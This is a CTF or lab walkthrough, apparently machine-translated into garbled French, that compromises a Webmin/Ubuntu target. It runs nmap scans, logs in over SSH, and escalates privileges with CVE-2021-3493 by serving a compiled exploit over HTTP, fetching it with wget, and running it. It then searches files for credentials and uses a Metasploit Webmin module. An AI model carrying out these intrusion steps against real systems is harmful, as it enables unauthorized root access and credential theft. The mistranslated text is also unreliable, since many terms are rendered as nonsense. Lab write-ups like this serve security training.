Table des matières

Un.、nmapScan Survival Host

2.、Sonde de version de service

Trois、Collecte d'informations

Quatre、Fuite d'information du système interne

 Cinq、sshConnexion

 Six、0dayDroit de rétractation

1.Télécharger l'exécution de la compilation

Sept、 Droit de revendication normal

1. firefox

2. TrouvercubesDocuments connexes

3.suOui.cubes

 4.findRecherche

5.ConnexionwebminBackground

Huit、msf

Un.、nmapScan Survival Host

1.Scan semi - ouvert

nmap -sS ip

2.Balayage ouvert complet

nmap -sT ip

3.Basé surpingScan de

nmap -sP ip

4.Basé surarpScan de

nmap -PR ip

5.AucunepingScan

nmap -PN 192.168.152.130

2.、Sonde de version de service

22,80 Ou deux services communs ,10000Le port est ouvert.webmin

Webmin Est la base la plus puissante WebDeUnixOutils de gestion du système. Accès de l'Administrateur via le Navigateur Webmin Diverses fonctions de gestion et mesures de gestion correspondantes .WebminSoutenir la grande majorité desUnixSystème, Ces systèmes, à l'exception de toutes les versions linuxEn plus de：AIX、HPUX、Solaris、Unixware、IrixEtFreeBSDAttendez..

Trois、Collecte d'informations

 80 Le port n'a aucune information utile pour franchir la frontière.

Mais dans10000 On en a trouvé un. webminBoîte de connexion pour

1.webminBoîte de connexion pour

2.robots.txtDocumentation

 3.Essayer de déchiffrer

we scan php codes with rips

4.rips

 RIPS Est un bon outil d'analyse de code source statique , Utilisé principalement pour creuser PHP Vulnérabilité du programme . Et c'est un webInterface,Accès àripsCommencez à utiliser. Essayer d'accéder .

En fin de compte,80 On a vu ça sous le port. rips

Quatre、Fuite d'information du système interne

 Cinq、sshConnexion

Essayez de vous connecter ici webmin Pas en coulisses. .Essayer d'utilisersshConnexion réussie,

 Six、0dayDroit de rétractation

Parce qu'après le lancement de cette cible, ,unbuntu Il y a une faille dans les droits. .Pour que nous puissions utiliser directement.

Numéro de vulnérabilité：cve-2021-3493

1.Télécharger l'exécution de la compilation

L'hôte cible n'a pas d'environnement de compilation ,Précompilé

gcc exploit.c -o exp

OuverthttpServices

python3 -m http.server 80

Télécharger

wget http://192.168.0.106/exp

Droit de donner

chmod 777 exp

Mise en œuvre

./exp

Sept、 Droit de revendication normal

1. firefox

J'ai vu un autre navigateur Firefox. , Ça ne sert à rien. .

2. TrouvercubesDocuments connexes

find / -user cubes -type f -exec ls -al {} \;  2>/dev/null

Cet ordre{} Est utilisé pour recevoir les résultats

C'est pour s'échapper. ;De

 Après une recherche, J'ai un code. ,Je suppose quecubesDe

3.suOui.cubes

 4.findRecherche

Recherche etcubesQuestions connexes, Et filtrer ce qui est inutile

 find / -user cubes -type f -exec ls -al {} \;  2>/dev/null |grep -v "proc"

Nous l'avons trouvé dans le fichier journal adminNuméro de compte, mot de passe

5.ConnexionwebminBackground

Parce qu'on a le numéro de compte de l'Administrateur. ,Encore parce quewebminC'est le contrôle.linuxTerminalweb‘Application’, Donc vous avez les permissions les plus élevées depuis que vous vous êtes connecté .

Huit、msf

Je suis juste venu me familiariser avec l'utilisation. ,Parce quemsfDerce Le module nécessite également un mot de passe de compte , Mais avec le compte et le mot de passe, nous pouvons obtenir l'autorisation de l'Administrateur directement.

msfconsole

search webmin

use 2

show options

Définir les paramètres

C'est là que ça doit être réglé.

set ssl true